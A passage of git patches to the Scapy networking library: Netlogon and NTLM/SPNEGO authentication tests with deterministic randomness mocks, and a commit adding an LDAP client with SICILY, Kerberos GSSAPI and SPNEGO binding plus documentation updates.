Patch all the random + mock.patch('scapy.layers.msrpce.msnrpc.os.urandom', side_effect=fake_urandom), +] + +class NetlogonRandomPatcher: + def __enter__(self): + for p in _patches: + p.start() + def __exit__(self, *args, **kwargs): + for p in _patches: + p.stop() + += Create client and server NetlogonSSP + +from scapy.layers.msrpce.msnrpc import NetlogonSSP, NL_AUTH_MESSAGE + +client = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN") +server = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN") + += GSS_Init_sec_context (NL_AUTH_MESSAGE) + +clicontext, tok, negResult = client.GSS_Init_sec_context(None) + +assert negResult == 1 +assert isinstance(tok, NL_AUTH_MESSAGE) +assert tok.MessageType == 0 +assert tok.Flags == 3 + +bytes(tok) +assert bytes(tok) == b'\x00\x00\x00\x00\x03\x00\x00\x00DOMAIN\x00DC1\x00' + += GSS_Accept_sec_context (NL_AUTH_MESSAGE->NL_AUTH_MESSAGE) + +srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + +assert negResult == 0 +assert tok.MessageType == 1 + +bytes(tok) +assert bytes(tok) == b'\x01\x00\x00\x00\x00\x00\x00\x00' + += GSS_Init_sec_context (NL_AUTH_MESSAGE->OK) + +clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + +assert negResult == 0 +assert tok is None + += GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload + +data_header = b"header" # signed but not encrypted +data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" # encrypted + +with NetlogonRandomPatcher(): + _msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] + ) + +encrypted = _msgs[1].data +assert bytes(encrypted) == b'~\x82\xda\x9e>t?QA\xe7\x06B\x87\x01\x03\x97\xea\xd2\xe9\xc4\xbfM$\x95VKxivff\x93\x9a\xe8\rbe#\xe6W\xb4\x82A\xd8\xa7\xf7]\xf3\xb0\x88' +assert bytes(sig) == b'w\x00z\x00\xff\xff\x00\x00\x9f\xcb\xb6s\x8c\x8c\x0c*\xa9E\xa4\xd1\x85\xee.\xa2:\xd7\x99\xdaO\x05N ' + +decrypted = server.GSS_UnwrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), + ], + sig +)[1].data +assert decrypted == data + += GSS_WrapEx/GSS_UnwrapEx: server answers back + +with NetlogonRandomPatcher(): + _msgs, sig = server.GSS_WrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] + ) + +re_encrypted = _msgs[1].data +assert bytes(re_encrypted) == b'\x9b\xc7c\x81\xfbF(\x19\xb6>\x08i\x7f\x18~H\xd6m~\x11K\x83\xb6\x15\x9a\xceP\xa1K\x8d\x83\xbb\xa7\x0fR*J\x89-\xec!\xde\xffs)\xd8F\x9c@^' +assert bytes(sig) == b'w\x00z\x00\xff\xff\x00\x00\x9f\xcb\xb6r\x0c\x8c\x0c*\xa9E\xa4\xd1\x85\xee.\xa2\xdf\x92 \xc5\x8a7Yh' + +decrypted = client.GSS_UnwrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=re_encrypted), + ], + sig +)[1].data +assert decrypted == data + += GSS_WrapEx/GSS_UnwrapEx: inject fault + +_msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +encrypted = _msgs[1].data +assert encrypted != data +bad_data_header = data_header[:-3] + b"hey" +try: + server.GSS_UnwrapEx(srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=bad_data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), + ], + sig + ) + assert False, "No error was reported, but there should have been one" +except ValueError: + pass diff --git a/test/scapy/layers/ntlm.uts b/test/scapy/layers/ntlm.uts index 6a241381055..236b4bbf7fd 100644 --- a/test/scapy/layers/ntlm.uts +++ b/test/scapy/layers/ntlm.uts @@ -89,7 +89,7 @@ assert SignKey == b'G\x88\xdc\x86\x1bG\x82\xf3]C\xfd\x98\xfe\x1a-9' # Build SSP and Context manually ssp = NTLMSSP() -ctx = NTLMSSP.CONTEXT() +ctx = NTLMSSP.CONTEXT(IsAcceptor=False) ctx.SendSeqNum = SeqNum ctx.SendSignKey = SignKey ctx.SendSealKey = SealKey @@ -107,18 +107,38 @@ assert bytes(sig) == b'\x01\x00\x00\x00\x7f\xb3\x8e\xc5\xc5]Iv\x00\x00\x00\x00' + GSS-API SPNEGO: SPNEGOSSP tests += Create randomness-mock context manager + +# mock the random to get consistency +import mock + +def fake_urandom(x): + # wow, impressive entropy + return b"0" * x + +_patches = [ + # Patch all the random + mock.patch('scapy.layers.ntlm.os.urandom', side_effect=fake_urandom), +] + +class NTLMRandomPatcher: + def __enter__(self): + for p in _patches: + p.start() + def __exit__(self, *args, **kwargs): + for p in _patches: + p.stop() + + = Create client and server SPNEGOSSPs from scapy.layers.ntlm import NTLM_NEGOTIATE from scapy.layers.spnego import SPNEGO_negTokenInit, SPNEGO_negTokenResp, SPNEGO_Token, SPNEGO_negToken, SPNEGO_MechListMIC, SPNEGOSSP -auth_level = 0x06 # privacy - client = SPNEGOSSP([ NTLMSSP( UPN="User1", PASSWORD="Password1", - auth_level=auth_level, ), ]) server = SPNEGOSSP([ @@ -133,13 +153,19 @@ server = SPNEGOSSP([ "DnsComputerName": "WIN10.domain.local", "DnsTreeName": "domain.local", }, - auth_level=auth_level, ) ]) = GSS_Init_sec_context (negTokenInit: NTLM_NEGOTIATE) -clicontext, tok, negResult = client.GSS_Init_sec_context(None) +clicontext, tok, negResult = client.GSS_Init_sec_context( + None, + req_flags=( + GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | + GSS_C_FLAGS.GSS_C_INTEG_FLAG | + GSS_C_FLAGS.GSS_C_CONF_FLAG + ) +) assert negResult == 1 assert isinstance(tok, GSSAPI_BLOB) tok = GSSAPI_BLOB(bytes(tok)) @@ -165,7 +191,9 @@ assert bytes(ntlm_nego) == b'NTLMSSP\x00\x01\x00\x00\x005\x82\x89\xe2\x00\x00\x0 = GSS_Accept_sec_context (SPNEGO_negTokenResp: NTLM_NEGOTIATE->NTLM_CHALLENGE) -srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) +with NTLMRandomPatcher(): + srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + assert negResult == 1 assert isinstance(tok, SPNEGO_negToken) tok = SPNEGO_negToken(bytes(tok)) @@ -187,7 +215,9 @@ assert ntlm_chall.getAv(0) = GSS_Init_sec_context (SPNEGO_negToken: NTLM_CHALLENGE->NTLM_AUTHENTICATE) -clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) +with NTLMRandomPatcher(): + clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + assert isinstance(tok, SPNEGO_negToken) tok = SPNEGO_negToken(bytes(tok)) assert isinstance(tok.token, SPNEGO_negTokenResp) @@ -210,7 +240,7 @@ assert ntlm_auth.NtChallengeResponse.TimeStamp == ntlm_chall.getAv(7).Value assert ntlm_auth.NtChallengeResponse.getAv(6).Value == 2 assert ntlm_auth.NtChallengeResponse.getAv(9).Value == "host/WIN10" -= GSS_Accept_sec_context (SPNEGO_negToken: NTLM_AUTHENTICATE->Resp) += GSS_Accept_sec_context (SPNEGO_negToken: NTLM_AUTHENTICATE->OK) srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok) assert negResult == 0 # success :p @@ -224,20 +254,27 @@ sig = NTLMSSP_MESSAGE_SIGNATURE(tok.token.mechListMIC.value.val) assert sig.Version == 1 assert sig.SeqNum == 0 +assert srvcontext.SessionKey == clicontext.SessionKey +assert clicontext.SessionKey == b"0000000000000000" + = GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload data_header = b"header" # signed but not encrypted data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" # encrypted -_msgs, sig = client.GSS_WrapEx( - clicontext, - [ - SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), - SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) - ] -) +with NTLMRandomPatcher(): + _msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] + ) + encrypted = _msgs[1].data -assert encrypted != data +assert bytes(encrypted) == b'\x9c_\xe9\xf2D\xc3\xe9^\xcd\x939\xff\xac\xa8\x16Y7\xcb \x80mS\xee.3\x85\x90\xfe\xb1_l\xcc\xcc\x7fl\x1ae,\x8b\xb3\x1cK\xd7zT\x1b\xd4W9Z' +assert sig.Checksum == b'\x91\xca\x9d\x0c\x15\x1e\xc5"' + decrypted = server.GSS_UnwrapEx( srvcontext, [ @@ -250,15 +287,19 @@ assert decrypted == data = GSS_WrapEx/GSS_UnwrapEx: server answers back -_msgs, sig = server.GSS_WrapEx( - srvcontext, - [ - SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), - SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) - ] -) +with NTLMRandomPatcher(): + _msgs, sig = server.GSS_WrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] + ) + re_encrypted = _msgs[1].data -assert re_encrypted != data and re_encrypted != encrypted +assert bytes(re_encrypted) == b'\x8f@s\x9c\xa5[\xd4\xee\xb6\x9b,\x96\xe6\x94\x8e\x8d\x1565\x81\xd0E\xe9WI\xd0\\\x80\x9fD\x1f\xee\xfb\xe5\xc6s\x0c+\t\xba,\xf1\xa2Zj\xd6\x0e\xe4C\x02' +assert sig.Checksum == b'\x11l/\xeaO\xb8\x08z' + decrypted = client.GSS_UnwrapEx( clicontext, [ @@ -269,18 +310,22 @@ decrypted = client.GSS_UnwrapEx( )[1].data assert decrypted == data -= GSS_WrapEx/GSS_UnwrapEx: client continues with seqnum 1 += GSS_WrapEx/GSS_UnwrapEx: client continues with seqnum 2 + +with NTLMRandomPatcher(): + _msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] + ) -_msgs, sig = client.GSS_WrapEx( - clicontext, - [ - SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), - SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) - ] -) encrypted = _msgs[1].data -assert encrypted != data -assert sig.SeqNum == 1 +assert bytes(encrypted) == b'\x96\xc2\xa8>\xa8\xc0\xb8\xc6\xb6\x8a\xe3\xc2\x84\x8a\xd4e\xeb?"s\xf9\x1drfC\xb9\xbe\xe8\x1e9\xfe\xa1\xa8^\xbe\x0e\x98\xb3]\xa0\x906\xf6`\xdfn\x88d_L' +assert sig.Checksum == b'\xc5t\xfa\xba\x1c\x9d-\xa1' + +assert sig.SeqNum == 2 decrypted = server.GSS_UnwrapEx( srvcontext, [ @@ -304,7 +349,7 @@ encrypted = _msgs[1].data assert encrypted != data bad_data_header = data_header[:-3] + b"hey" try: - client.GSS_UnwrapEx(clicontext, + server.GSS_UnwrapEx(srvcontext, [ SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=bad_data_header), SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), From c36f92917d6a234562185bb9f40fc53f6b40ba62 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 19 Mar 2024 11:42:15 +0100 Subject: [PATCH 1236/1632] Add LDAP client (#4323) * Add LDAP client, Improve NTLM Supports the following binding methods: - simple - SPNEGO (windows) - GSSAPI (kerberos, linux) - SICILY (windows, ntlm only) * Documentation update --- doc/scapy/layers/dcerpc.rst | 4 +- doc/scapy/layers/gssapi.rst | 20 ++ doc/scapy/layers/smb.rst | 4 + scapy/layers/gssapi.py | 8 +- scapy/layers/kerberos.py | 59 +++-- scapy/layers/ldap.py | 363 +++++++++++++++++++++++++++--- scapy/layers/msrpce/msnrpc.py | 2 +- scapy/layers/ntlm.py | 398 ++++++++++++++++++--------------- scapy/layers/smb.py | 1 + scapy/layers/smb2.py | 4 + scapy/layers/smbclient.py | 15 +- scapy/layers/smbserver.py | 4 + scapy/layers/spnego.py | 15 +- test/scapy/layers/kerberos.uts | 47 ++++ 14 files changed, 708 insertions(+), 236 deletions(-) diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index a39825f7037..14024f4e828 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -359,10 +359,10 @@ Of course that also works over :const:`~scapy.layers.dcerpc.DCERPC_Transport.NCA .. code-block:: python - from scapy.layers.ntlm import NTLMSSP + from scapy.layers.ntlm import NTLMSSP, MD4le ssp = NTLMSSP( IDENTITIES={ - "User1": NTOWFv2("Password", "User1", "DOMAIN"), + "User1": MD4le("Password"), } ) diff --git a/doc/scapy/layers/gssapi.rst b/doc/scapy/layers/gssapi.rst index bfdd9154225..d4b3d6571bd 100644 --- a/doc/scapy/layers/gssapi.rst +++ b/doc/scapy/layers/gssapi.rst @@ -13,6 +13,8 @@ Scapy provides access to various `Security Providers `_ \ No newline at end of file diff --git a/doc/scapy/layers/smb.rst b/doc/scapy/layers/smb.rst index 5beebfbb989..202ced7b663 100644 --- a/doc/scapy/layers/smb.rst +++ b/doc/scapy/layers/smb.rst @@ -7,6 +7,8 @@ You can use the :class:`~scapy.layers.smb2.SMB2_Header` to dissect or build SMB2 .. warning:: Encryption is currently not supported in neither the client nor server. +.. _client: + SMB 2/3 client -------------- @@ -207,6 +209,8 @@ It's also accessible as the ``ins`` attribute of a ``SMB_SOCKET``, or the ``sock >>> lowsmbsock = cli.sock >>> resp = cli.sock.sr1(SMB2_Tree_Connect_Request(Path=r"\\server1\c$")) +.. _server: + SMB 2/3 server -------------- diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 8b1b664660a..d3ca8cac56f 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -18,8 +18,9 @@ - :class:`~scapy.layers.spnego.SPNEGOSSP` - :class:`~scapy.layers.msrpce.msnrpc.NetlogonSSP` -You can find the general GSSAPI documentation at -https://scapy.readthedocs.io/en/latest/layers/gssapi.html +.. note:: + You will find more complete documentation for this layer over at + `GSSAPI `_ """ import abc @@ -472,7 +473,7 @@ def GSS_Wrap( # sect 2.3.4 - def GSS_Unwrap(self, Context: CONTEXT, input_message: bytes): + def GSS_Unwrap(self, Context: CONTEXT, input_message: bytes, signature): return self.GSS_UnwrapEx( Context, [ @@ -482,6 +483,7 @@ def GSS_Unwrap(self, Context: CONTEXT, input_message: bytes): data=input_message, ) ], + signature, )[0].data # MISC diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 7c8d7f36718..2330321081e 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -22,7 +22,7 @@ .. note:: - You will find more complete documentation for this layer over + You will find more complete documentation for this layer over at `Kerberos `_ Example decryption:: @@ -1879,7 +1879,6 @@ def m2i(self, pkt, s): if not val[0].val: return val if pkt.dataType.val == 3: # KERB_ERR_TYPE_EXTENDED - print(val[0].val) return KERB_EXT_ERROR(val[0].val, _underlayer=pkt), val[1] return val @@ -3148,8 +3147,6 @@ class KerberosSSP(SSP): """ The KerberosSSP - :param auth_level: One of DCE_C_AUTHN_LEVEL - Client settings: :param ST: the service ticket to use for access. @@ -3359,18 +3356,28 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): else: # No confidentiality is requested # {"header" | plaintext-data | get_mic(plaintext-data | "header")} - raise NotImplementedError # 1. Add first 16 octets of the Wrap token "header" - Data += bytes(tok)[:16] + ToSign = Data + ToSign += bytes(tok)[:16] # 2. get_mic() is the checksum operation for the required # checksum mechanism - # XXX broken, bad 0404 should be 0504 XXX FIXME - tok.root.Data = self.GSS_GetMIC(Context, Data, qop_req=qop_req) - # "The RRC field is 12 if no encryption is requested" - tok.root.RRC = 12 + Mic = Context.KrbSessionKey.make_checksum( + keyusage=Context.SendSealKeyUsage, + text=ToSign, + ) # In Wrap tokens without confidentiality, the EC field SHALL be used # to encode the number of octets in the trailing checksum tok.root.EC = 12 # len(tok.root.Data) == 12 for AES + # "The RRC field ([RFC4121] section 4.2.5) is 12 if no encryption + # is requested" + tok.root.RRC = 12 + # 3. Concat and pack + for msg in msgs: + if msg.sign: + msg.data = b"" + Data = Data + Mic + # 4. Rotate + tok.root.Data = strrot(Data, tok.root.RRC) return msgs, tok else: raise NotImplementedError @@ -3383,10 +3390,10 @@ def GSS_UnwrapEx(self, Context, msgs, signature): """ if Context.KrbSessionKey.etype in [17, 18]: # AES confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG + # Real separation starts now: RFC4121 sect 4.2.4 # Concatenate the data Data = signature.root.Data Data += b"".join(x.data for x in msgs if x.sign or x.conf_req_flag) - # Real separation starts now: RFC4121 sect 4.2.4 if confidentiality: # 1. Un-Rotate Data = strrot(Data, signature.root.RRC + signature.root.EC, right=False) @@ -3415,7 +3422,33 @@ def GSS_UnwrapEx(self, Context, msgs, signature): offset += msglen return msgs else: - raise NotImplementedError + # No confidentiality is requested + # 1. Un-Rotate + Data = strrot(Data, signature.root.RRC, right=False) + # 2. Split + Data, Mic = Data[:-signature.root.EC], Data[-signature.root.EC:] + # "Both the EC field and the RRC field in + # the token header SHALL be filled with zeroes for the purpose of + # calculating the checksum." + ToSign = Data + hdr = signature.copy() + hdr.root.RRC = 0 + hdr.root.EC = 0 + # Concatenate the data + ToSign += bytes(hdr)[:16] + # 3. Calculate the signature + sig = Context.KrbSessionKey.make_checksum( + keyusage=Context.RecvSealKeyUsage, + text=ToSign, + ) + # 4. Compare + if sig != Mic: + raise ValueError("ERROR: Checksums don't match") + # 5. Split + for msg in msgs: + if msg.sign: + msg.data = Data + return msgs else: raise NotImplementedError @@ -3642,7 +3675,7 @@ def _setup_u2u(self): def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if Context is None: # New context - Context = self.CONTEXT(IsAcceptor=True) + Context = self.CONTEXT(IsAcceptor=True, req_flags=0) from scapy.libs.rfc3961 import Key, EncryptionType diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 932bda15d2c..7a9371636c9 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -45,7 +45,15 @@ from scapy.asn1packet import ASN1_Packet from scapy.config import conf from scapy.error import log_runtime -from scapy.packet import bind_bottom_up, bind_layers +from scapy.fields import ( + FlagsField, + ThreeBytesField, +) +from scapy.packet import ( + Packet, + bind_bottom_up, + bind_layers, +) from scapy.supersocket import ( SimpleSocket, StreamSocket, @@ -55,15 +63,15 @@ from scapy.layers.inet import IP, TCP, UDP from scapy.layers.inet6 import IPv6 from scapy.layers.gssapi import ( + GSS_C_FLAGS, GSS_S_COMPLETE, GSSAPI_BLOB, + GSSAPI_BLOB_SIGNATURE, SSP, ) from scapy.layers.kerberos import ( _ASN1FString_PacketField, - KRB_GSSAPI_Token, ) -from scapy.layers.ntlm import NTLMSSP from scapy.layers.smb import ( NETLOGON, NETLOGON_SAM_LOGON_RESPONSE_EX, @@ -110,6 +118,7 @@ class LDAPReferral(ASN1_Packet): 7: "authMethodNotSupported", 8: "strongAuthRequired", 10: "referral", + 11: "adminLimitExceeded", 14: "saslBindInProgress", 16: "noSuchAttribute", 17: "undefinedAttributeType", @@ -185,8 +194,13 @@ class ASN1_Class_LDAP_Authentication(ASN1_Class): krbv42LDAP = 0x81 krbv42DSA = 0x82 sasl = 0xA3 # CONTEXT-SPECIFIC | CONSTRUCTED + # [MS-ADTS] sect 5.1.1.1 + sicilyPackageDiscovery = 0x89 + sicilyNegotiate = 0x8A + sicilyResponse = 0x8B +# simple class LDAP_Authentication_simple(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.simple @@ -199,6 +213,7 @@ class ASN1F_LDAP_Authentication_simple(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.simple +# krbv42LDAP class LDAP_Authentication_krbv42LDAP(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42LDAP @@ -211,6 +226,7 @@ class ASN1F_LDAP_Authentication_krbv42LDAP(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42LDAP +# krbv42DSA class LDAP_Authentication_krbv42DSA(ASN1_STRING): tag = ASN1_Class_LDAP_Authentication.krbv42DSA @@ -223,12 +239,51 @@ class ASN1F_LDAP_Authentication_krbv42DSA(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42DSA -_SASL_MECHANISMS = {b"GSS-SPNEGO": GSSAPI_BLOB, b"GSSAPI": KRB_GSSAPI_Token} +# sicilyPackageDiscovery +class LDAP_Authentication_sicilyPackageDiscovery(ASN1_STRING): + tag = ASN1_Class_LDAP_Authentication.sicilyPackageDiscovery + + +class BERcodec_LDAP_Authentication_sicilyPackageDiscovery(BERcodec_STRING): + tag = ASN1_Class_LDAP_Authentication.sicilyPackageDiscovery + + +class ASN1F_LDAP_Authentication_sicilyPackageDiscovery(ASN1F_STRING): + ASN1_tag = ASN1_Class_LDAP_Authentication.sicilyPackageDiscovery + + +# sicilyNegotiate +class LDAP_Authentication_sicilyNegotiate(ASN1_STRING): + tag = ASN1_Class_LDAP_Authentication.sicilyNegotiate + + +class BERcodec_LDAP_Authentication_sicilyNegotiate(BERcodec_STRING): + tag = ASN1_Class_LDAP_Authentication.sicilyNegotiate + + +class ASN1F_LDAP_Authentication_sicilyNegotiate(ASN1F_STRING): + ASN1_tag = ASN1_Class_LDAP_Authentication.sicilyNegotiate + + +# sicilyResponse +class LDAP_Authentication_sicilyResponse(ASN1_STRING): + tag = ASN1_Class_LDAP_Authentication.sicilyResponse -class _ReqSaslCredentialsField(_ASN1FString_PacketField): +class BERcodec_LDAP_Authentication_sicilyResponse(BERcodec_STRING): + tag = ASN1_Class_LDAP_Authentication.sicilyResponse + + +class ASN1F_LDAP_Authentication_sicilyResponse(ASN1F_STRING): + ASN1_tag = ASN1_Class_LDAP_Authentication.sicilyResponse + + +_SASL_MECHANISMS = {b"GSS-SPNEGO": GSSAPI_BLOB, b"GSSAPI": GSSAPI_BLOB} + + +class _SaslCredentialsField(_ASN1FString_PacketField): def m2i(self, pkt, s): - val = super(_ReqSaslCredentialsField, self).m2i(pkt, s) + val = super(_SaslCredentialsField, self).m2i(pkt, s) if not val[0].val: return val if pkt.mechanism.val in _SASL_MECHANISMS: @@ -242,7 +297,11 @@ def m2i(self, pkt, s): class LDAP_Authentication_SaslCredentials(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - LDAPString("mechanism", ""), _ReqSaslCredentialsField("credentials", "") + LDAPString("mechanism", ""), + ASN1F_optional( + _SaslCredentialsField("credentials", ""), + ), + implicit_tag=ASN1_Class_LDAP_Authentication.sasl, ) @@ -257,12 +316,7 @@ class LDAP_BindRequest(ASN1_Packet): ASN1F_LDAP_Authentication_simple, ASN1F_LDAP_Authentication_krbv42LDAP, ASN1F_LDAP_Authentication_krbv42DSA, - ASN1F_PACKET( - "sasl", - LDAP_Authentication_SaslCredentials(), - LDAP_Authentication_SaslCredentials, - implicit_tag=ASN1_Class_LDAP_Authentication.sasl, - ), + LDAP_Authentication_SaslCredentials, ), implicit_tag=ASN1_Class_LDAP.BindRequest, ) @@ -273,11 +327,52 @@ class LDAP_BindResponse(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE( *( LDAPResult - + (ASN1F_optional(ASN1F_STRING("serverSaslCreds", "", implicit_tag=0x87)),) + + ( + ASN1F_optional( + # For GSSAPI, the response is wrapped in + # LDAP_Authentication_SaslCredentials + ASN1F_STRING("serverSaslCredsWrap", "", implicit_tag=0xA7), + ), + ) + + ( + ASN1F_optional( + ASN1F_STRING("serverSaslCreds", "", implicit_tag=0x87), + ), + ) ), implicit_tag=ASN1_Class_LDAP.BindResponse, ) + @property + def serverCreds(self): + """ + serverCreds field in SicilyBindResponse + """ + return self.matchedDN.val + + @serverCreds.setter + def serverCreds(self, val): + """ + serverCreds field in SicilyBindResponse + """ + self.matchedDN = ASN1_STRING(val) + + @property + def serverSaslCredsData(self): + """ + Get serverSaslCreds or serverSaslCredsWrap depending on what's available + """ + if self.serverSaslCredsWrap and self.serverSaslCredsWrap.val: + wrap = LDAP_Authentication_SaslCredentials(self.serverSaslCredsWrap.val) + val = wrap.credentials + if isinstance(val, ASN1_STRING): + return val.val + return bytes(val) + elif self.serverSaslCreds and self.serverSaslCreds.val: + return self.serverSaslCreds.val + else: + return None + # Unbind operation # https://datatracker.ietf.org/doc/html/rfc1777#section-4.2 @@ -901,6 +996,29 @@ class LDAP_BIND_MECHS(Enum): SASL_GSS_SPNEGO = "GSS-SPNEGO" SASL_EXTERNAL = "EXTERNAL" SASL_DIGEST_MD5 = "DIGEST-MD5" + # [MS-ADTS] extension + SICILY = "SICILY" + + +class LDAP_SASL_GSSAPI_SsfCap(Packet): + """ + RFC2222 sect 7.2.1 and 7.2.2 negotiate token + """ + + fields_desc = [ + FlagsField( + "supported_security_layers", + 0, + -8, + { + # https://github.com/cyrusimap/cyrus-sasl/blob/7e2feaeeb2e37d38cb5fa957d0e8a599ced22612/plugins/gssapi.c#L221 + 0x01: "NONE", + 0x02: "INTEGRITY", + 0x04: "CONFIDENTIALITY", + }, + ), + ThreeBytesField("max_output_token_size", 0), + ] class LDAP_Client(object): @@ -909,30 +1027,105 @@ class LDAP_Client(object): :param mech: one of LDAP_BIND_MECHS :param ssl: whether to use LDAPS or not + :param ssp: the SSP object to use for binding + + :param sign: request signing when binding + :param encrypt: request encryption when binding + + Example 1 - SICILY - NTLM:: + + ssp = NTLMSSP(UPN="Administrator", PASSWORD="Password1!") + client = LDAP_Client( + LDAP_BIND_MECHS.SICILY, + ssp=ssp, + ) + client.connect("192.168.0.100") + client.bind() + + Example 2 - SASL_GSSAPI - Kerberos:: + + ssp = KerberosSSP(UPN="Administrator", PASSWORD="Password1!", + SPN="ldap/dc1.domain.local") + client = LDAP_Client( + LDAP_BIND_MECHS.SASL_GSSAPI, + ssp=ssp, + ) + client.connect("192.168.0.100") + client.bind() + + Example 3 - SASL_GSS_SPNEGO - NTLM / Kerberos:: + + ssp = SPNEGOSSP([ + NTLMSSP(UPN="Administrator", PASSWORD="Password1!"), + KerberosSSP(UPN="Administrator", PASSWORD="Password1!", + SPN="ldap/dc1.domain.local"), + ]) + client = LDAP_Client( + LDAP_BIND_MECHS.SASL_GSS_SPNEGO, + ssp=ssp, + ) + client.connect("192.168.0.100") + client.bind() + + Example 4 - Simple bind:: + + client = LDAP_Client(LDAP_BIND_MECHS.SIMPLE) + client.connect("192.168.0.100") + client.bind(simple_username="Administrator", + simple_password="Password1!") """ - def __init__(self, mech, verb=True, ssl=False, sslcontext=None, **kwargs): + def __init__( + self, + mech, + verb=True, + ssl=False, + sslcontext=None, + ssp=None, + sign=False, + encrypt=False, + ): self.sock = None self.mech = mech self.verb = verb self.ssl = ssl self.sslcontext = sslcontext - self.ssp = kwargs.pop("ssp", None) # type: SSP + self.ssp = ssp # type: SSP assert isinstance(mech, LDAP_BIND_MECHS) - if isinstance(self.ssp, NTLMSSP): - raise ValueError("Cannot use raw NTLMSSP in LDAP ! Wrap it in SPNEGOSSP.") - elif self.ssp is not None and mech in [ + if mech == LDAP_BIND_MECHS.SASL_GSSAPI: + from scapy.layers.kerberos import KerberosSSP + + if not isinstance(self.ssp, KerberosSSP): + raise ValueError("Only raw KerberosSSP is supported with SASL_GSSAPI !") + elif mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO: + from scapy.layers.spnego import SPNEGOSSP + + if not isinstance(self.ssp, SPNEGOSSP): + raise ValueError("Only SPNEGOSSP is supported with SASL_GSS_SPNEGO !") + elif mech == LDAP_BIND_MECHS.SICILY: + from scapy.layers.ntlm import NTLMSSP + + if not isinstance(self.ssp, NTLMSSP): + raise ValueError("Only raw NTLMSSP is supported with SICILY !") + if self.ssp is not None and mech in [ LDAP_BIND_MECHS.NONE, LDAP_BIND_MECHS.SIMPLE, ]: raise ValueError("%s cannot be used with a ssp !" % mech.value) self.sspcontext = None + self.sign = sign + self.encrypt = encrypt self.messageID = 0 - def connect(self, ip, port=389, timeout=5): + def connect(self, ip, port=None, timeout=5): """ Initiate a connection """ + if port is None: + if self.ssl: + port = 636 + else: + port = 389 sock = socket.socket() sock.settimeout(timeout) if self.verb: @@ -1010,13 +1203,70 @@ def bind(self, simple_username=None, simple_password=None): if self.verb: resp.show() raise RuntimeError("LDAP simple bind failed !") + elif self.mech == LDAP_BIND_MECHS.SICILY: + # [MS-ADTS] sect 5.1.1.1.3 + # 1. Package Discovery + resp = self.sr1( + LDAP_BindRequest( + bind_name=ASN1_STRING(b""), + 